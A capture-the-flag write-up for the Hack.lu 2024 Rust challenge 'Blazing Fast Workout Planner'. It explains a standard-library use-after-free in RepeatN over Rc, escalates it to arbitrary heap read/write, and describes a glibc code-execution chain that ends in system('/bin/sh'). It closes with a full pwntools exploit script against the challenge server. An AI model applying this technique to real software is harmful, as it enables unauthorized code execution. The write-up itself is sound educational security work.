Hack.lu CTF 2024: "Blazing Fast Workout Planner"

index

First look

Here is the source code for the challenge:

1
#![feature(get_mut_unchecked)]
2

3
use std::collections::BTreeMap;
4
use std::io::{self, Read, Stdin, Stdout, Write};
5
use std::iter::RepeatN;
6
use std::rc::Rc;
7

8
struct InputHelper {
9
    stdin: Stdin,
10
    stdout: Stdout,
11
    buf: Vec<u8>,
12
}
13

14
impl InputHelper {
15
    fn with_capacity(cap: usize) -> Self {
16
        let stdin = io::stdin();
17
        let stdout = io::stdout();
18
        Self {
19
            stdin,
20
            stdout,
21
            buf: vec![0u8; cap],
22
        }
23
    }
24

25
    fn ask(&mut self, msg: &str) -> &[u8] {
26
        self.stdout.write(msg.as_bytes()).unwrap();
27
        self.stdout.write(b"\n").unwrap();
28
        let len = self.stdin.read(&mut self.buf).unwrap();
29
        &self.buf[..len].trim_ascii()
30
    }
31

32
    fn ask_num(&mut self, msg: &str) -> i64 {
33
        let buf = self.ask(msg);
34
        std::str::from_utf8(buf).unwrap().parse().unwrap()
35
    }
36
}
37

38
#[derive(Debug)]
39
struct Exercise {
40
    name: Vec<u8>,
41
    description: Vec<u8>,
42
}
43

44
#[derive(Debug, Clone)]
45
struct Workout {
46
    exercises: Vec<RepeatN<Rc<Exercise>>>,
47
}
48

49
fn main() {
50
    let mut exercises = BTreeMap::new();
51
    let mut workouts = Vec::new();
52

53
    let mut input = InputHelper::with_capacity(0x100);
54

55
    println!("Welcome to your personal training helper! Here are your options:");
56
    loop {
57
        println!("1. : add a new exercise to your portfolio");
58
        println!("2. : plan a new workout");
59
        println!("3. : start a training session");
60
        println!("4. : edit an exercise");
61
        println!("5. : exit the app");
62

63
        let line = input.ask("Choose an option: ").trim_ascii();
64
        match &*line {
65
            b"1" => {
66
                let name = input.ask("What's the name of your exercise? ").to_owned();
67

68
                let description = input
69
                    .ask("what is the description of your exercise? ")
70
                    .to_owned();
71

72
                let name2 = name.clone();
73
                let exercise: Exercise = Exercise { name, description };
74
                exercises.insert(name2, Rc::new(exercise));
75
                println!("Exercise added!");
76
            }
77
            b"2" => {
78
                let num_exercises = input.ask_num("How many exercises should your workout have? ");
79
                let mut workout = Workout {
80
                    exercises: Vec::new(),
81
                };
82

83
                for _ in 0..num_exercises {
84
                    let name = input.ask("Enter the name of the exercise: ");
85
                    if let Some(exercise) = exercises.get(name) {
86
                        let num_repetitions =
87
                            input.ask_num("How many times should your exercise be repeated? ");
88
                        workout.exercises.push(std::iter::repeat_n(
89
                            Rc::clone(exercise),
90
                            num_repetitions as usize,
91
                        ));
92
                    } else {
93
                        println!("No exercise found with that name.");
94
                    }
95
                }
96

97
                println!("Your workout has id {}", workouts.len());
98
                workouts.push(workout);
99
            }
100
            b"3" => {
101
                let id = input.ask_num("what's the id of your workout? ");
102

103
                let workout = &workouts[id as usize];
104

105
                for exercise in workout.exercises.iter().cloned() {
106
                    for ex in exercise {
107
                        println!("{:?} - {:?}", ex.name, ex.description); // pls  help, this looks weird :(
108
                    }
109
                }
110
            }
111
            b"4" => {
112
                let name = input.ask("Enter the name of the exercise you want to edit: ");
113
                if let Some(exercise) = exercises.get_mut(name) {
114
                    let description = input.ask("Enter the new description: ");
115
                    unsafe {
116
                        Rc::get_mut_unchecked(exercise)
117
                            .description
118
                            .copy_from_slice(description)
119
                    }
120
                    println!("Exercise updated!");
121
                } else {
122
                    println!("No exercise found with that name.");
123
                }
124
            }
125
            b"5" => break,
126
            _ => println!("That was not a valid option"),
127
        }
128
    }
129
}

The challenge allows you to create Exercise structures and Workout structures:

1
#[derive(Debug)]
2
struct Exercise {
3
    name: Vec<u8>,
4
    description: Vec<u8>,
5
}
6

7
#[derive(Debug, Clone)]
8
struct Workout {
9
    exercises: Vec<RepeatN<Rc<Exercise>>>,
10
}

and always wraps Exercise in a Rc:

1
                let exercise: Exercise = Exercise { name, description };
2
                exercises.insert(name2, Rc::new(exercise));
3
                println!("Exercise added!");

`std::rc::Rc`

Rc stands for “reference counted” and is documented here in the rust documentation. Rc is a type that allows for shared ownership of a value through refcounting. When a Rc is created, the internal refcount is set to 1. When a Rc is cloned, the internal refcount is incremented, and when dropped the refcount is decremented. Modifying the Rc value is only allowed when the refcount is 1, meaning that there is only 1 owner and not breaking rusts shared mutability rules.

The internal structure of Rc looks like this:

1
struct RcBox<T> {
2
    size_t strong;
3
    size_t weak;
4
    T value;
5
};
6

7
struct Rc<T> {
8
    RcBox<T> * ptr;
9
};

All of the cloned copies of a Rc point to the same RcBox which is allocated on the heap. When the strong refcount reaches 0 the internal RcBox pointer is freed. This is safe because Rc disallows cloning once the refcount reaches 0.

Sus code 1

Immediately this part of the code looks suspicious:

1
            b"4" => {
2
                let name = input.ask("Enter the name of the exercise you want to edit: ");
3
                if let Some(exercise) = exercises.get_mut(name) {
4
                    let description = input.ask("Enter the new description: ");
5
                    unsafe {
6
                        Rc::get_mut_unchecked(exercise)
7
                            .description
8
                            .copy_from_slice(description)
9
                    }
10
                    println!("Exercise updated!");
11
                } else {
12
                    println!("No exercise found with that name.");
13
                }
14
            }

since it contains an unsafe block. However this code, in the context of the rest of the program, is actually “safe”, because if an Rc value exists in the hashmap the refcount must be at least 1 and the backing pointer is safe to write to the underlying value. This part of the code is not exploitable, even though it contains an unsafe block.

Sus code 2

The type of the workouts vec is Vec<RepeatN<Rc<Exercise>>>, which is unusual. I have never come across Rust code that stored a RepeatN iterator combined with Rc values. A quick search for “RepeatN” and “Rc” brings up a GitHub issue that mentions a UAF bug in the standard library involving RepeatN iterators over Rc values!

https://github.com/rust-lang/rust/issues/130140

The issue was opened on 09/09/24, and the provided rust-toolchain.toml pins the rustc version to nightly-2024-09-09. Not suspicious at all.

stdlib UAF

What does RepeatN do? RepeatN is an iterator type that returns the wrapped value $n$ times before terminating. The issues arises from how Rc interacts with RepeatN when the repeat count is 0.

This is the POC segfault provided by the GitHub issue:

1
use std::rc::Rc;
2
fn main() {
3
    let mut c = [0; 100];
4
    let x = std::iter::repeat_n(Rc::new(0), 0);
5
    let y = Box::new(&mut c);
6
    for _ in 0..100 {
7
        _ = x.clone();
8
    }
9
    y.fill(0);
10
}

When a RepeatN iterator is constructed with a count of 0 it will immediately drop the wrapped value. This causes problems for Rc because the backing pointer is freed, while RepeatN still holds a reference. Cloning the RepeatN iterator after the Rc value if freed will increment the RcBox<T>->strong count of the now freed backing pointer, giving an UAF increment primitive.

UAF heap increment

In order to properly exploit this bug we need to allocate some heap object over the UAF’d object that has a useful value in the first qword (so it overlaps with RcBox<T>->strong). On GNU/Linux systems Rust defaults to linking glibc and defers to glibc malloc to manage memory. RcBox<Exercise> gets allocated in a 0x50 sized chunk, we need to somehow reclaim the freed RcBox<Exercise> with a useful structure. Since we only control the first qword, the structure must have some useful field in the first qword that allows for further exploitation.

It turns out that the backing memory for the Workout->exercises vector is allocated in a 0x50 sized chunk!

The backing memory looks like this:

         ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ uaf increment on this value
 +0x00 | pointer to RcBox<Exercise> | ━┓
 +0x08 | repeat count               | ━┻━━━ workout->exercises[0]
 +0x10 | pointer to RcBox<Exercise> | ━┓
 +0x18 | repeat count               | ━┻━━━ workout->exercises[1]

Arbitrary heap increment

Remember that the Workout->exercises vector stores RepeatN<Rc<Exercise>> values. The original UAF increment is initially achieved through RepeatN with a count of 0, but now we can control the RcBox<Exercise> pointer that RepeatN uses. Using the initial UAF increment to modify the RcBox<Exercise> pointer of another RepeatN, escalates the bug to arbitrary increment in the heap.

Arbitrary heap read/write

With arbitrary increment can now modify the backing pointer of the Exercise->description field:

1
struct Exercise {
2
    name: Vec<u8>,
3
    description: Vec<u8>,
4
}

Modifying Exercise("A")->description to point to Exercise("B")->description escalates our arbitrary increment bug to arbitrary heap read/write. Using Exercise("A") to modify the description field of Exercise("B") to an arbitrary address, then read/writing from Exercise("B") to achieve arbitrary read/write:

1
            b"4" => {
2
                let name = input.ask("Enter the name of the exercise you want to edit: ");
3
                if let Some(exercise) = exercises.get_mut(name) {
4
                    let description = input.ask("Enter the new description: ");
5
                    unsafe {
6
                        Rc::get_mut_unchecked(exercise)
7
                            .description
8
                            .copy_from_slice(description)
9
                    }
10
                    println!("Exercise updated!");
11
                } else {
12
                    println!("No exercise found with that name.");
13
                }
14
            }

RCE

Normally the go-to libc RCE is overwriting stdout and using the wide vtable to call system("/bin/sh"), but this is Rust the stdlib which does not use libc stdout and stdin. Instead they use the file descriptors directly, bypassing stdout and making FSOP impossible.

Alternatively we can attack the destructors that are called in exit(), but that causes its own issues because of all the heap pointers that have been modified, which crashes the program when main returns.

There is another novel method which I discovered while playing another CTF. The full call chain looks like:

__libc_read
┗━ SYSCALL_CANCEL
  ┗━ LIBC_CANCEL_ASYNC
    ┗━ __pthread_enable_asynccancel
      ┗━ __do_cancel
        ┗━ __pthread_unwind
          ┗━ _Unwind_ForcedUnwind
            ┗━ PTR_DEMANGLE(link()->ptr__Unwind_ForcedUnwind)

It only depends on the program using the __libc_read function. Breaking on __libc_read and running the challenge shows that __libc_read is used by Rust stdlib!

1
#0  __GI___libc_read (fd=0x0, buf=0x5555555c2b80, nbytes=0x2000)
2
    at ../sysdeps/unix/sysv/linux/read.c:25
3
#1  0x000055555559716e in std::sys::pal::unix::fd::FileDesc::read_buf ()
4
    at std/src/sys/pal/unix/fd.rs:156
5
#2  std::sys::pal::unix::stdio::{impl#1}::read_buf () at std/src/sys/pal/unix/stdio.rs:22
6
#3  std::io::stdio::{impl#0}::read_buf () at std/src/io/stdio.rs:104
7
#4  std::io::impls::{impl#0}::read_buf<std::io::stdio::StdinRaw> () at std/src/io/impls.rs:21
8
#5  std::io::buffered::bufreader::buffer::Buffer::fill_buf<&mut std::io::stdio::StdinRaw> ()
9
    at std/src/io/buffered/bufreader/buffer.rs:136
10
#6  std::io::buffered::bufreader::{impl#6}::fill_buf<std::io::stdio::StdinRaw> ()
11
    at std/src/io/buffered/bufreader.rs:433
12
#7  std::io::buffered::bufreader::{impl#5}::read<std::io::stdio::StdinRaw> ()
13
    at std/src/io/buffered/bufreader.rs:325
14
#8  0x0000555555597d66 in std::io::stdio::{impl#8}::read () at std/src/io/stdio.rs:499
15
#9  std::io::stdio::{impl#5}::read () at std/src/io/stdio.rs:433
16
#10 0x000055555557a29c in blazing_fast_workout_planner::InputHelper::ask (self=0x7fffffffd460,
17
    msg="Choose an option: ") at src/main.rs:28
18
#11 0x000055555557a69a in blazing_fast_workout_planner::main () at src/main.rs:63

Elixir links

__libc_read SYSCALL_CANCEL LIBC_CANCEL_ASYNC __pthread_enable_asynccancel __do_cancel __pthread_unwind _Unwind_ForcedUnwind __libc_unwind_link_get UNWIND_LINK_PTR

Here are the necessary requirements to trigger the call an arbitrary function (in this case exit):

1
*((fs_base + 0x308) as *mut u64) = 8;
2
libc.global.ptr__Unwind_ForcedUnwind = PTR_MANGLE(exit);
3
libc.global_libgcc_handle = 1 as usize;
4
libc.__libc_single_threaded_internal = 0 as u8;

Also setup a destructor to trigger a shell:

1
libc.__exit_funcs[0].fns[0].func.on.fn = PTR_MANGLE(system);
2
libc.__exit_funcs[0].fns[0].func.on.arg = &"/bin/sh";

Full solve

1
from pwn import *
2
from pwnc.gdb.launch import attach
3
import builtins
4

5
if args.REMOTE:
6
    p = remote("162.55.187.21", "1024")
7
else:
8
    p = remote("localhost", 1024)
9
    p.recv(1)
10
p.settimeout(10)
11

12
file = ELF("./chall")
13
linker = ELF("./ld-linux-x86-64.so.2")
14
libc = ELF("./libc.so.6")
15

16
if args.GDB:
17
    g = attach("/chall", elf=file)
18

19
def tele(n: int):
20
    return g.parse_and_eval(f"(usize[{n}]*)0").type
21

22
exercises = []
23
def callback():
24
    global exercises
25
    val = g.parse_and_eval("value.ptr.pointer")
26
    val.format_string()
27
    exercises.append(val)
28

29
    return False
30

31
if args.GDB:
32
    track = g.bp(
33
        "alloc::collections::btree::map::BTreeMap<alloc::vec::Vec<u8, alloc::alloc::Global>, alloc::rc::Rc<blazing_fast_workout_planner::Exercise, alloc::alloc::Global>, alloc::alloc::Global>::insert<alloc::vec::Vec<u8, alloc::alloc::Global>, alloc::rc::Rc<blazing_fast_workout_planner::Exercise, alloc::alloc::Global>, alloc::alloc::Global>",
34
        callback
35
    )
36
    g.execute("b system")
37
    g.execute("c")
38

39
def send(after: bytes, val, line: bool = False):
40
    match type(val):
41
        case builtins.int | builtins.str:
42
            val = f"{val}".encode()
43
        case builtins.bytes:
44
            pass
45
    if line: exit("bad")
46
    p.sendafter(after, val.ljust(0x100, b" "))
47

48
def sendline(after: bytes, val):
49
    send(after, val, line=True)
50

51
def make_exercise(name: int, desc: int, name_size: int = 0, desc_size: int = 8):
52
    payload = b""
53
    payload += p64(1) * 2
54
    payload += p64(name_size)
55
    payload += p64(name)
56
    payload += p64(name_size)
57
    payload += p64(desc_size)
58
    payload += p64(desc)
59
    payload += p64(desc_size)
60
    payload += p64(1)
61
    return payload
62

63
def create_exercise(name: bytes, desc: bytes):
64
    send(b"option: \n", 1)
65
    send(b"? \n", name)
66
    send(b"? \n", desc)
67

68
if args.GDB:
69
    create_exercise = track.wait(create_exercise)
70

71
def plan_workout(exs: list[tuple[bytes, int]]):
72
    send(b"option: \n", 2)
73
    send(b"? \n", len(exs))
74
    for ex in exs:
75
        send(b": \n", ex[0])
76
        send(b"? \n", ex[1])
77
    p.recvuntil(b"Your workout has id ")
78
    return int(p.recvline())
79

80
def start_session(id: int):
81
    send(b"option: \n", 3)
82
    send(b"? \n", id)
83

84
    outputs = []
85
    while True:
86
        ch = p.recv(1)
87
        if ch != b"[":
88
            break
89

90
        name = bytes(eval("[" + p.recvuntil(b"]", drop=True).decode() + "]"))
91
        p.recvuntil(b" - ")
92
        desc = bytes(eval(p.recvline().decode()))
93
        outputs.append((name, desc))
94

95
    return outputs
96

97
def edit_exercise(name, desc):
98
    send(b"option: \n", 4)
99
    send(b": \n", name)
100
    send(b": \n", desc)
101

102
a = "a" * 0x18
103
b = "b" * 0x18
104
mapping = {}
105

106
create_exercise(a, "0")
107
id = plan_workout([
108
    (a, 0),
109
])
110
mapping[a] = id
111
create_exercise(a, "1")
112

113
victim = plan_workout([
114
    (a, 0),
115
])
116

117
tramp = "T" * 0x48
118
target = "X" * 0x48
119
create_exercise(tramp, "R" * 0x48)
120
create_exercise(target, "Y" * 0x48)
121

122
if args.GDB:
123
    print([str(ex) for ex in exercises])
124
    print(exercises[0].cast(tele(4))[0].format_string())
125

126
payload = b""
127
for _ in range(0x170):
128
    payload += b"3".ljust(0x100, b" ")
129
    payload += f"{mapping[a]}".encode().ljust(0x100, b" ")
130

131
send(b"option: \n", payload)
132
for _ in range(0x170-1):
133
    p.recvuntil(b"option: \n")
134

135
if args.GDB:
136
    print(exercises[0].cast(tele(4))[0].format_string())
137

138
payload = b""
139
for _ in range(0x1e0):
140
    payload += b"3".ljust(0x100, b" ")
141
    payload += f"{victim}".encode().ljust(0x100, b" ")
142

143
send(b"option: \n", payload)
144
for _ in range(0x1e0-1):
145
    p.recvuntil(b"option: \n")
146

147
print(f"{tramp = }")
148

149
leaker = plan_workout([
150
    (tramp, 1),
151
])
152
leaks = start_session(leaker)
153
leak = u64(leaks[0][1][0x18:0x20])
154
print(f"{leak = :#x}")
155
heapbase = leak - 0x3180
156
print(f"{heapbase = :#x}")
157

158
reader = plan_workout([
159
    (target, 1),
160
])
161

162
def arbread(addr: int):
163
    edit_exercise(tramp, make_exercise(heapbase, addr))
164
    leaks = start_session(reader)
165
    print(leaks)
166
    return leaks[0][1]
167

168
def arbwrite(addr: int, val: bytes):
169
    edit_exercise(tramp, make_exercise(heapbase, addr, desc_size=len(val)))
170
    assert b"\n" not in val
171
    edit_exercise(target, val)
172

173
leak = u64(arbread(heapbase + 0x470))
174
print(f"{leak = :#x}")
175
libc.address = leak - 0x202228
176
print(f"{libc.address = :#x}")
177

178
linker.address = u64(arbread(libc.address + 0x2046b8)) - 0x38000
179

180
fn = libc.address + 0x204fd8
181
enc = u64(arbread(fn))
182
mask = (1 << 64) - 1
183
cookie = (enc >> 17 & mask) | (enc << (64 - 17) & mask)
184
cookie ^= linker.sym._dl_fini
185

186
print(f"{cookie = :#x}")
187

188
enc = libc.sym.system ^ cookie
189
enc = (enc << 17 & mask) | (enc >> (64 - 17) & mask)
190
arbwrite(libc.sym.initial + 24, p64(enc) + p64(next(libc.search(b"/bin/sh\x00"))))
191

192
tls = u64(arbread(linker.address + 0x390a0)) - 0x9a0
193
print(f"{tls = :#x}")
194

195
enc = libc.sym.exit ^ cookie
196
enc = (enc << 17 & mask) | (enc >> (64 - 17) & mask)
197
arbwrite(tls + 0x308, p32(8))
198
arbwrite(libc.sym.global_libgcc_handle, p64(1))
199
arbwrite(libc.address + 0x20b080 + 8, p64(enc))
200
arbwrite(libc.sym.__libc_single_threaded_internal, p8(0))
201

202
if args.GDB:
203
    g.execute("interrupt")
204
p.interactive()